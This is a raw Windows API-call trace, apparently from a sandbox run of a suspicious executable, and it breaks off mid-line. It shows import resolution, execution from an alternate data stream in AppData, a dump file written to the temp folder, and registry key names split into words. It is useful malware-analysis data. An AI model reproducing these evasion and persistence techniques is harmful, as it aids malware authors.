[0116.163] GetProcAddress (hModule=0x77970000, lpProcName="_aulldvrm") returned 0x779e59d0 [0116.163] GetProcAddress (hModule=0x77970000, lpProcName="NtQueryVirtualMemory") returned 0x779e1f40 [0116.164] LoadLibraryExA (lpLibFileName="SHLWAPI.dll", hFile=0x0, dwFlags=0x0) returned 0x76ba0000 [0116.164] GetProcAddress (hModule=0x76ba0000, lpProcName="PathCombineW") returned 0x76bb8890 [0116.164] GetProcAddress (hModule=0x76ba0000, lpProcName="StrToIntExW") returned 0x76bb77c0 [0116.164] GetProcAddress (hModule=0x76ba0000, lpProcName="StrTrimW") returned 0x76bb7300 [0116.259] GetProcAddress (hModule=0x76ba0000, lpProcName="StrRChrW") returned 0x76bb84a0 [0116.259] GetProcAddress (hModule=0x76ba0000, lpProcName="StrStrW") returned 0x76bb7850 [0116.259] GetProcAddress (hModule=0x76ba0000, lpProcName="PathFileExistsW") returned 0x76bb4660 [0116.260] GetProcAddress (hModule=0x76ba0000, lpProcName="PathFindFileNameW") returned 0x76bb3c60 [0116.260] GetProcAddress (hModule=0x76ba0000, lpProcName="StrCmpNW") returned 0x76bb2800 [0116.260] GetProcAddress (hModule=0x76ba0000, lpProcName="PathFindExtensionW") returned 0x76bb3c20 [0116.260] GetProcAddress (hModule=0x76ba0000, lpProcName="StrChrW") returned 0x76bb27c0 [0116.260] LoadLibraryExA (lpLibFileName="KERNEL32.dll", hFile=0x0, dwFlags=0x0) returned 0x772d0000 [0116.260] GetProcAddress (hModule=0x772d0000, lpProcName="SetEndOfFile") returned 0x7733f0e0 [0116.260] GetProcAddress (hModule=0x772d0000, lpProcName="SetUnhandledExceptionFilter") returned 0x772e6720 [0116.260] GetProcAddress (hModule=0x772d0000, lpProcName="GetCurrentProcess") returned 0x7733ea10 [0116.261] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0116.261] GetProcAddress (hModule=0x772d0000, lpProcName="WaitForSingleObject") returned 0x7733eca0 [0116.261] GetProcAddress (hModule=0x772d0000, lpProcName="lstrcatW") returned 0x773271a0 [0116.261] GetProcAddress (hModule=0x772d0000, lpProcName="SetEvent") returned 0x7733ec50 [0116.261] GetProcAddress (hModule=0x772d0000, lpProcName="GetCurrentThreadId") returned 0x772e8820 [0116.261] GetProcAddress (hModule=0x772d0000, lpProcName="ExitThread") returned 0x779d6390 [0116.262] GetProcAddress (hModule=0x772d0000, lpProcName="lstrlenW") returned 0x772e6c70 [0116.262] GetProcAddress (hModule=0x772d0000, lpProcName="CloseHandle") returned 0x7733eab0 [0116.262] GetProcAddress (hModule=0x772d0000, lpProcName="DeleteFileW") returned 0x7733ed40 [0116.262] GetProcAddress (hModule=0x772d0000, lpProcName="GetCurrentProcessId") returned 0x7733ea20 [0116.262] GetProcAddress (hModule=0x772d0000, lpProcName="GetLastError") returned 0x772e5010 [0116.262] GetProcAddress (hModule=0x772d0000, lpProcName="SetFilePointer") returned 0x7733f120 [0116.263] GetProcAddress (hModule=0x772d0000, lpProcName="GetProcAddress") returned 0x772e51b0 [0116.263] GetProcAddress (hModule=0x772d0000, lpProcName="GetDiskFreeSpaceExW") returned 0x7733eea0 [0116.263] GetProcAddress (hModule=0x772d0000, lpProcName="lstrcpyW") returned 0x77327140 [0116.263] GetProcAddress (hModule=0x772d0000, lpProcName="SetFileAttributesW") returned 0x7733f100 [0116.263] GetProcAddress (hModule=0x772d0000, lpProcName="WriteFile") returned 0x7733f180 [0116.263] GetProcAddress (hModule=0x772d0000, lpProcName="MoveFileW") returned 0x7731e500 [0116.264] GetProcAddress (hModule=0x772d0000, lpProcName="HeapAlloc") returned 0x779b2dc0 [0116.265] GetProcAddress (hModule=0x772d0000, lpProcName="InterlockedIncrement") returned 0x772e7420 [0116.265] GetProcAddress (hModule=0x772d0000, lpProcName="HeapFree") returned 0x772e57f0 [0116.265] GetProcAddress (hModule=0x772d0000, lpProcName="CopyFileW") returned 0x7733f3b0 [0116.265] GetProcAddress (hModule=0x772d0000, lpProcName="ExitProcess") returned 0x772e3cb0 [0116.265] GetProcAddress (hModule=0x772d0000, lpProcName="GetCommandLineW") returned 0x772e4cc0 [0116.265] GetProcAddress (hModule=0x772d0000, lpProcName="CreateEventA") returned 0x7733eb00 [0116.266] GetProcAddress (hModule=0x772d0000, lpProcName="GetProcessHeap") returned 0x772e51f0 [0116.266] GetProcAddress (hModule=0x772d0000, lpProcName="GetModuleHandleA") returned 0x772e50b0 [0116.266] GetProcAddress (hModule=0x772d0000, lpProcName="GetSystemTimeAsFileTime") returned 0x772e5530 [0116.266] GetProcAddress (hModule=0x772d0000, lpProcName="lstrcmpW") returned 0x772e6bb0 [0116.266] GetProcAddress (hModule=0x772d0000, lpProcName="GetVersion") returned 0x772e56c0 [0116.266] GetProcAddress (hModule=0x772d0000, lpProcName="WaitForMultipleObjects") returned 0x7733ec80 [0116.266] GetProcAddress (hModule=0x772d0000, lpProcName="CreateThread") returned 0x772e46b0 [0116.267] GetProcAddress (hModule=0x772d0000, lpProcName="Sleep") returned 0x772e6760 [0116.267] GetProcAddress (hModule=0x772d0000, lpProcName="CreateProcessW") returned 0x772e4610 [0116.267] GetProcAddress (hModule=0x772d0000, lpProcName="GetExitCodeProcess") returned 0x772e3c60 [0116.267] GetProcAddress (hModule=0x772d0000, lpProcName="CreateDirectoryW") returned 0x7733ece0 [0116.267] GetProcAddress (hModule=0x772d0000, lpProcName="TerminateProcess") returned 0x772e67e0 [0116.267] GetProcAddress (hModule=0x772d0000, lpProcName="lstrlenA") returned 0x772e6c50 [0116.267] GetProcAddress (hModule=0x772d0000, lpProcName="InitializeCriticalSection") returned 0x779caf20 [0116.268] GetProcAddress (hModule=0x772d0000, lpProcName="DeleteCriticalSection") returned 0x7799fb90 [0116.268] GetProcAddress (hModule=0x772d0000, lpProcName="FindNextFileW") returned 0x7733ee40 [0116.268] GetProcAddress (hModule=0x772d0000, lpProcName="ResetEvent") returned 0x7733ec40 [0116.268] GetProcAddress (hModule=0x772d0000, lpProcName="InterlockedDecrement") returned 0x772e73c0 [0116.268] GetProcAddress (hModule=0x772d0000, lpProcName="FindClose") returned 0x7733ed70 [0116.268] GetProcAddress (hModule=0x772d0000, lpProcName="EnterCriticalSection") returned 0x779bb2d0 [0116.268] GetProcAddress (hModule=0x772d0000, lpProcName="GetCurrentDirectoryW") returned 0x772e4e80 [0116.269] GetProcAddress (hModule=0x772d0000, lpProcName="FindFirstFileW") returned 0x7733edf0 [0116.269] GetProcAddress (hModule=0x772d0000, lpProcName="LoadLibraryA") returned 0x772e5a80 [0116.269] GetProcAddress (hModule=0x772d0000, lpProcName="LeaveCriticalSection") returned 0x779bb250 [0116.269] GetProcAddress (hModule=0x772d0000, lpProcName="QueryDosDeviceW") returned 0x7733f080 [0116.269] GetProcAddress (hModule=0x772d0000, lpProcName="QueryPerformanceCounter") returned 0x772e5da0 [0116.269] GetProcAddress (hModule=0x772d0000, lpProcName="GetLogicalDriveStringsW") returned 0x7733efb0 [0116.269] GetProcAddress (hModule=0x772d0000, lpProcName="GetDriveTypeW") returned 0x7733eed0 [0116.270] GetProcAddress (hModule=0x772d0000, lpProcName="GetFileAttributesW") returned 0x7733ef10 [0116.270] GetProcAddress (hModule=0x772d0000, lpProcName="QueryPerformanceFrequency") returned 0x772e5dc0 [0116.270] GetProcAddress (hModule=0x772d0000, lpProcName="MultiByteToWideChar") returned 0x772e5c40 [0116.270] GetProcAddress (hModule=0x772d0000, lpProcName="SetFileTime") returned 0x7733f140 [0116.270] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileMappingW") returned 0x772e44b0 [0116.270] GetProcAddress (hModule=0x772d0000, lpProcName="GetTempPathW") returned 0x7733eff0 [0116.270] GetProcAddress (hModule=0x772d0000, lpProcName="UnmapViewOfFile") returned 0x772e68f0 [0116.270] GetProcAddress (hModule=0x772d0000, lpProcName="MapViewOfFile") returned 0x772e5be0 [0116.270] GetProcAddress (hModule=0x772d0000, lpProcName="GetModuleFileNameW") returned 0x772e5090 [0116.271] GetProcAddress (hModule=0x772d0000, lpProcName="ReadFile") returned 0x7733f090 [0116.271] GetProcAddress (hModule=0x772d0000, lpProcName="GetFileSize") returned 0x7733ef30 [0116.271] GetProcAddress (hModule=0x772d0000, lpProcName="GetWindowsDirectoryW") returned 0x772e5730 [0116.271] GetProcAddress (hModule=0x772d0000, lpProcName="ExpandEnvironmentStringsW") returned 0x772e4a40 [0116.271] GetProcAddress (hModule=0x772d0000, lpProcName="GetTempFileNameW") returned 0x7733efd0 [0116.271] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x756e0000 [0116.272] GetProcAddress (hModule=0x756e0000, lpProcName="RegisterServiceCtrlHandlerW") returned 0x75700940 [0116.272] GetProcAddress (hModule=0x756e0000, lpProcName="RegOpenKeyW") returned 0x756ff460 [0116.272] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextW") returned 0x756ffa40 [0116.272] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGenRandom") returned 0x75700730 [0116.272] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0116.272] GetProcAddress (hModule=0x756e0000, lpProcName="GetSidSubAuthority") returned 0x756ff230 [0116.273] GetProcAddress (hModule=0x756e0000, lpProcName="GetTokenInformation") returned 0x756fee90 [0116.273] GetProcAddress (hModule=0x756e0000, lpProcName="OpenProcessToken") returned 0x756fefb0 [0116.273] GetProcAddress (hModule=0x756e0000, lpProcName="GetSidSubAuthorityCount") returned 0x756ff420 [0116.273] GetProcAddress (hModule=0x756e0000, lpProcName="StartServiceCtrlDispatcherW") returned 0x75700900 [0116.273] GetProcAddress (hModule=0x756e0000, lpProcName="OpenSCManagerW") returned 0x75700540 [0116.273] GetProcAddress (hModule=0x756e0000, lpProcName="SetServiceStatus") returned 0x75700650 [0116.273] GetProcAddress (hModule=0x756e0000, lpProcName="RegDeleteValueW") returned 0x75700580 [0116.274] GetProcAddress (hModule=0x756e0000, lpProcName="DeleteService") returned 0x75712f50 [0116.274] GetProcAddress (hModule=0x756e0000, lpProcName="RegSetValueExW") returned 0x756ff530 [0116.275] GetProcAddress (hModule=0x756e0000, lpProcName="RegCloseKey") returned 0x756fed60 [0116.275] GetProcAddress (hModule=0x756e0000, lpProcName="StartServiceW") returned 0x75703b20 [0116.275] GetProcAddress (hModule=0x756e0000, lpProcName="CloseServiceHandle") returned 0x756ffc00 [0116.275] GetProcAddress (hModule=0x756e0000, lpProcName="ControlService") returned 0x757126d0 [0116.275] GetProcAddress (hModule=0x756e0000, lpProcName="CreateServiceW") returned 0x75712790 [0116.275] GetProcAddress (hModule=0x756e0000, lpProcName="RegOpenKeyExW") returned 0x756fe580 [0116.276] GetProcAddress (hModule=0x756e0000, lpProcName="QueryServiceStatusEx") returned 0x756ffac0 [0116.276] GetProcAddress (hModule=0x756e0000, lpProcName="RegEnumKeyW") returned 0x756ff1d0 [0116.276] LoadLibraryExA (lpLibFileName="SHELL32.dll", hFile=0x0, dwFlags=0x0) returned 0x75760000 [0116.276] GetProcAddress (hModule=0x75760000, lpProcName="ShellExecuteExW") returned 0x758c4730 [0116.276] LoadLibraryExA (lpLibFileName="ole32.dll", hFile=0x0, dwFlags=0x0) returned 0x753c0000 [0116.289] GetProcAddress (hModule=0x753c0000, lpProcName="CreateStreamOnHGlobal") returned 0x74a02af0 [0116.289] VirtualProtect (in: lpAddress=0x401000, dwSize=0x7967, flNewProtect=0x1d0160, lpflOldProtect=0x19fbc4 | out: lpflOldProtect=0x19fbc4*=0x2) returned 0 [0116.497] VirtualProtect (in: lpAddress=0x409000, dwSize=0xe76, flNewProtect=0x1d0140, lpflOldProtect=0x19fbc4 | out: lpflOldProtect=0x19fbc4*=0x2) returned 0 [0116.497] VirtualProtect (in: lpAddress=0x40a000, dwSize=0x658, flNewProtect=0x1d0148, lpflOldProtect=0x19fbc4 | out: lpflOldProtect=0x19fbc4*=0x2) returned 0 [0116.497] VirtualProtect (in: lpAddress=0x40b000, dwSize=0x4658, flNewProtect=0x1d0140, lpflOldProtect=0x19fbc4 | out: lpflOldProtect=0x19fbc4*=0x2) returned 0 [0116.498] VirtualProtect (in: lpAddress=0x410000, dwSize=0x944, flNewProtect=0x1d0140, lpflOldProtect=0x19fbc4 | out: lpflOldProtect=0x19fbc4*=0x2) returned 0 [0116.499] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0116.500] GetProcessHeap () returned 0x820000 [0116.500] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x466c) returned 0x842fc8 [0116.620] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x19ff54 | out: lpSystemTimeAsFileTime=0x19ff54*(dwLowDateTime=0xd7e101e5, dwHighDateTime=0x1d63873)) [0116.620] QueryPerformanceFrequency (in: lpFrequency=0x19ff5c | out: lpFrequency=0x19ff5c*=100000000) returned 1 [0116.620] QueryPerformanceCounter (in: lpPerformanceCount=0x19ff4c | out: lpPerformanceCount=0x19ff4c*=21176027892) returned 1 [0116.621] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x254 [0116.621] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0116.621] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x208) returned 0x840948 [0116.621] GetModuleFileNameW (in: hModule=0x400000, lpFilename=0x840948, nSize=0x104 | out: lpFilename="C:\\Users\\FD1HVy\\AppData\\Roaming\\Still:bin" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\still:bin")) returned 0x29 [0116.621] StrRChrW (lpStart="C:\\Users\\FD1HVy\\AppData\\Roaming\\Still:bin", lpEnd=0x0, wMatch=0x5c) returned="\\Still:bin" [0116.621] lstrlenW (lpString="Still:bin") returned 9 [0116.621] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x14) returned 0x82b4c8 [0116.622] PathFindExtensionW (pszPath="Still:bin") returned="" [0116.622] StrChrW (lpStart="Still:bin", wMatch=0x3a) returned=":bin" [0116.622] LoadLibraryA (lpLibFileName="DBGHELP.DLL") returned 0x73e40000 [0117.060] GetProcAddress (hModule=0x73e40000, lpProcName="MiniDumpWriteDump") returned 0x73e1aea0 [0117.066] lstrlenW (lpString="Still") returned 5 [0117.066] ExpandEnvironmentStringsW (in: lpSrc="%temp%\\", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x24 [0117.067] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x5c) returned 0x83e908 [0117.067] ExpandEnvironmentStringsW (in: lpSrc="%temp%\\", lpDst=0x83e908, nSize=0x24 | out: lpDst="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x24 [0117.067] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\", lpString2="Still" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Still") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Still" [0117.067] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Still", lpString2=".dmp" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Still.dmp") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Still.dmp" [0117.067] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Still.dmp" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\still.dmp"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x25c [0117.291] SetFilePointer (in: hFile=0x25c, lDistanceToMove=65536, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x10000 [0117.291] SetEndOfFile (hFile=0x25c) returned 1 [0117.292] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x401af6) returned 0x0 [0117.292] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Control", phkResult=0x19ff80 | out: phkResult=0x19ff80*=0x260) returned 0x0 [0117.292] RegEnumKeyW (in: hKey=0x260, dwIndex=0x0, lpName=0x19fd50, cchName=0x104 | out: lpName="ACPI") returned 0x0 [0117.292] lstrlenW (lpString="ACPI") returned 4 [0117.293] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x16) returned 0x82b6a8 [0117.293] RegEnumKeyW (in: hKey=0x260, dwIndex=0x1, lpName=0x19fd50, cchName=0x104 | out: lpName="AppID") returned 0x0 [0117.293] lstrlenW (lpString="AppID") returned 5 [0117.293] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x14) returned 0x82b828 [0117.293] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x12) returned 0x82b6e8 [0117.293] RegEnumKeyW (in: hKey=0x260, dwIndex=0x2, lpName=0x19fd50, cchName=0x104 | out: lpName="AppReadiness") returned 0x0 [0117.294] lstrlenW (lpString="AppReadiness") returned 12 [0117.294] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x14) returned 0x82b668 [0117.294] lstrcmpW (lpString1="app", lpString2="app") returned 0 [0117.455] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x82b668 | out: hHeap=0x820000) returned 1 [0117.455] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x20) returned 0x82c030 [0117.455] RegEnumKeyW (in: hKey=0x260, dwIndex=0x3, lpName=0x19fd50, cchName=0x104 | out: lpName="Arbiters") returned 0x0 [0117.455] lstrlenW (lpString="Arbiters") returned 8 [0117.455] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x1e) returned 0x82c0a8 [0117.455] RegEnumKeyW (in: hKey=0x260, dwIndex=0x4, lpName=0x19fd50, cchName=0x104 | out: lpName="BackupRestore") returned 0x0 [0117.455] lstrlenW (lpString="BackupRestore") returned 13 [0117.455] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x1a) returned 0x82bd88 [0117.455] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x1c) returned 0x82bf90 [0117.455] RegEnumKeyW (in: hKey=0x260, dwIndex=0x5, lpName=0x19fd50, cchName=0x104 | out: lpName="BitLocker") returned 0x0 [0117.455] lstrlenW (lpString="BitLocker") returned 9 [0117.455] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x14) returned 0x82b488 [0117.456] lstrcmpW (lpString1="app", lpString2="bit") returned -1 [0117.456] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x1a) returned 0x82be50 [0117.456] lstrcmpW (lpString1="backup", lpString2="locker") returned -1 [0117.456] RegEnumKeyW (in: hKey=0x260, dwIndex=0x6, lpName=0x19fd50, cchName=0x104 | out: lpName="CI") returned 0x0 [0117.456] lstrlenW (lpString="CI") returned 2 [0117.456] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x12) returned 0x82b448 [0117.456] lstrcmpW (lpString1="id", lpString2="ci") returned 1 [0117.456] RegEnumKeyW (in: hKey=0x260, dwIndex=0x7, lpName=0x19fd50, cchName=0x104 | out: lpName="Class") returned 0x0 [0117.456] lstrlenW (lpString="Class") returned 5 [0117.456] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x18) returned 0x82b5a8 [0117.456] RegEnumKeyW (in: hKey=0x260, dwIndex=0x8, lpName=0x19fd50, cchName=0x104 | out: lpName="CMF") returned 0x0 [0117.456] lstrlenW (lpString="CMF") returned 3 [0117.456] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x14) returned 0x82b628 [0117.456] lstrcmpW (lpString1="app", lpString2="cmf") returned -1 [0117.456] lstrcmpW (lpString1="bit", lpString2="cmf") returned -1 [0117.456] RegEnumKeyW (in: hKey=0x260, dwIndex=0x9, lpName=0x19fd50, cchName=0x104 | out: lpName="CoDeviceInstallers") returned 0x0 [0117.456] lstrlenW (lpString="CoDeviceInstallers") returned 18 [0117.456] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x12) returned 0x82b7e8 [0117.457] lstrcmpW (lpString1="id", lpString2="co") returned 1 [0117.457] lstrcmpW (lpString1="ci", lpString2="co") returned -1 [0117.457] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x1a) returned 0x82c0d0 [0117.457] lstrcmpW (lpString1="backup", lpString2="device") returned -1 [0117.457] lstrcmpW (lpString1="locker", lpString2="device") returned 1 [0117.457] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x22) returned 0x838b90 [0117.457] RegEnumKeyW (in: hKey=0x260, dwIndex=0xa, lpName=0x19fd50, cchName=0x104 | out: lpName="COM Name Arbiter") returned 0x0 [0117.457] lstrlenW (lpString="COM Name Arbiter") returned 16 [0117.457] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x14) returned 0x82b608 [0117.457] lstrcmpW (lpString1="app", lpString2="com") returned -1 [0117.457] lstrcmpW (lpString1="bit", lpString2="com") returned -1 [0117.457] lstrcmpW (lpString1="cmf", lpString2="com") returned -1 [0117.457] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x16) returned 0x82b708 [0117.457] lstrcmpW (lpString1="acpi", lpString2="name") returned -1 [0117.457] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x1c) returned 0x82bd38 [0117.457] lstrcmpW (lpString1="restore", lpString2="arbiter") returned 1 [0117.457] RegEnumKeyW (in: hKey=0x260, dwIndex=0xb, lpName=0x19fd50, cchName=0x104 | out: lpName="CommonGlobUserSettings") returned 0x0 [0117.457] lstrlenW (lpString="CommonGlobUserSettings") returned 22 [0117.457] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x1a) returned 0x82bdb0 [0117.457] lstrcmpW (lpString1="backup", lpString2="common") returned -1 [0117.458] lstrcmpW (lpString1="locker", lpString2="common") returned 1 [0117.458] lstrcmpW (lpString1="device", lpString2="common") returned 1 [0117.458] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x16) returned 0x82b788 [0117.458] lstrcmpW (lpString1="acpi", lpString2="glob") returned -1 [0117.458] lstrcmpW (lpString1="name", lpString2="glob") returned 1 [0117.458] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x16) returned 0x82b548 [0117.458] lstrcmpW (lpString1="acpi", lpString2="user") returned -1 [0117.458] lstrcmpW (lpString1="name", lpString2="user") returned -1 [0117.458] lstrcmpW (lpString1="glob", lpString2="user") returned -1 [0117.458] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x1e) returned 0x82bdd8 [0117.458] lstrcmpW (lpString1="arbiters", lpString2="settings") returned -1 [0117.458] RegEnumKeyW (in: hKey=0x260, dwIndex=0xc, lpName=0x19fd50, cchName=0x104 | out: lpName="Compatibility") returned 0x0 [0117.458] lstrlenW (lpString="Compatibility") returned 13 [0117.458] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x28) returned 0x838ce0 [0117.458] RegEnumKeyW (in: hKey=0x260, dwIndex=0xd, lpName=0x19fd50, cchName=0x104 | out: lpName="ComputerName") returned 0x0 [0117.458] lstrlenW (lpString="ComputerName") returned 12 [0117.458] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x1e) returned 0x82c3a0 [0117.458] lstrcmpW (lpString1="arbiters", lpString2="computer") returned -1 [0117.458] lstrcmpW (lpString1="settings", lpString2="computer") returned 1 [0117.458] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x16) returned 0x82b668 [0117.458] lstrcmpW (lpString1="acpi", lpString2="name") returned -1 [0117.459] lstrcmpW (lpString1="name", lpString2="name") returned 0 [0117.459] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x82b668 | out: hHeap=0x820000) returned 1 [0117.459] RegEnumKeyW (in: hKey=0x260, dwIndex=0xe, lpName=0x19fd50, cchName=0x104 | out: lpName="ContentIndex") returned 0x0 [0117.459] lstrlenW (lpString="ContentIndex") returned 12 [0117.459] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x1c) returned 0x82c3f0 [0117.459] lstrcmpW (lpString1="restore", lpString2="content") returned 1 [0117.459] lstrcmpW (lpString1="arbiter", lpString2="content") returned -1 [0117.459] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x18) returned 0x82b668 [0117.459] lstrcmpW (lpString1="class", lpString2="index") returned -1 [0117.459] RegEnumKeyW (in: hKey=0x260, dwIndex=0xf, lpName=0x19fd50, cchName=0x104 | out: lpName="CrashControl") returned 0x0 [0117.459] lstrlenW (lpString="CrashControl") returned 12 [0117.459] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x18) returned 0x82b528 [0117.459] lstrcmpW (lpString1="class", lpString2="crash") returned -1 [0117.459] lstrcmpW (lpString1="index", lpString2="crash") returned 1 [0117.459] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x1c) returned 0x82c418 [0117.459] lstrcmpW (lpString1="restore", lpString2="control") returned 1 [0117.459] lstrcmpW (lpString1="arbiter", lpString2="control") returned -1 [0117.459] lstrcmpW (lpString1="content", lpString2="control") returned -1 [0117.459] RegEnumKeyW (in: hKey=0x260, dwIndex=0x10, lpName=0x19fd50, cchName=0x104 | out: lpName="Cryptography") returned 0x0 [0117.459] lstrlenW (lpString="Cryptography") returned 12 [0117.459] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x26) returned 0x838bc0 [0117.459] RegEnumKeyW (in: hKey=0x260, dwIndex=0x11, lpName=0x19fd50, cchName=0x104 | out: lpName="DeviceClasses") returned 0x0 [0117.460] lstrlenW (lpString="DeviceClasses") returned 13 [0117.460] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x1a) returned 0x82c2d8 [0117.460] lstrcmpW (lpString1="backup", lpString2="device") returned -1 [0117.460] lstrcmpW (lpString1="locker", lpString2="device") returned 1 [0117.460] lstrcmpW (lpString1="device", lpString2="device") returned 0 [0117.460] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x82c2d8 | out: hHeap=0x820000) returned 1 [0117.460] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x1c) returned 0x82c2b0 [0117.460] lstrcmpW (lpString1="restore", lpString2="classes") returned 1 [0117.460] lstrcmpW (lpString1="arbiter", lpString2="classes") returned -1 [0117.460] lstrcmpW (lpString1="content", lpString2="classes") returned 1 [0117.460] lstrcmpW (lpString1="control", lpString2="classes") returned 1 [0117.460] RegEnumKeyW (in: hKey=0x260, dwIndex=0x12, lpName=0x19fd50, cchName=0x104 | out: lpName="DeviceContainerPropertyUpdateEvents") returned 0x0 [0117.460] lstrlenW (lpString="DeviceContainerPropertyUpdateEvents") returned 35 [0117.460] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x1a) returned 0x82c2d8 [0117.460] lstrcmpW (lpString1="backup", lpString2="device") returned -1 [0117.460] lstrcmpW (lpString1="locker", lpString2="device") returned 1 [0117.460] lstrcmpW (lpString1="device", lpString2="device") returned 0 [0117.460] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x82c2d8 | out: hHeap=0x820000) returned 1 [0117.460] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x20) returned 0x82c210 [0117.460] lstrcmpW (lpString1="readiness", lpString2="container") returned 1 [0117.460] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x1e) returned 0x82c490 [0117.461] lstrcmpW (lpString1="arbiters", lpString2="property") returned -1 [0117.461] lstrcmpW (lpString1="settings", lpString2="property") returned 1 [0117.461] lstrcmpW (lpString1="computer", lpString2="property") returned -1 [0117.461] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x1a) returned 0x82c440 [0117.461] lstrcmpW (lpString1="backup", lpString2="update") returned -1 [0117.461] lstrcmpW (lpString1="locker", lpString2="update") returned -1 [0117.461] lstrcmpW (lpString1="device", lpString2="update") returned -1 [0117.461] lstrcmpW (lpString1="common", lpString2="update") returned -1 [0117.461] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x1a) returned 0x82c300 [0117.461] lstrcmpW (lpString1="backup", lpString2="events") returned -1 [0117.461] lstrcmpW (lpString1="locker", lpString2="events") returned 1 [0117.461] lstrcmpW (lpString1="device", lpString2="events") returned -1 [0117.461] lstrcmpW (lpString1="common", lpString2="events") returned -1 [0117.461] lstrcmpW (lpString1="update", lpString2="events") returned 1 [0117.461] RegEnumKeyW (in: hKey=0x260, dwIndex=0x13, lpName=0x19fd50, cchName=0x104 | out: lpName="DeviceContainers") returned 0x0 [0117.560] lstrlenW (lpString="DeviceContainers") returned 16 [0117.560] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x1a) returned 0x82c468 [0117.560] lstrcmpW (lpString1="backup", lpString2="device") returned -1 [0117.560] lstrcmpW (lpString1="locker", lpString2="device") returned 1 [0117.560] lstrcmpW (lpString1="device", lpString2="device") returned 0 [0117.560] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x82c468 | out: hHeap=0x820000) returned 1 [0117.560] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x22) returned 0x838d10 [0117.560] lstrcmpW (lpString1="installers", lpString2="containers") returned 1 [0117.560] RegEnumKeyW (in: 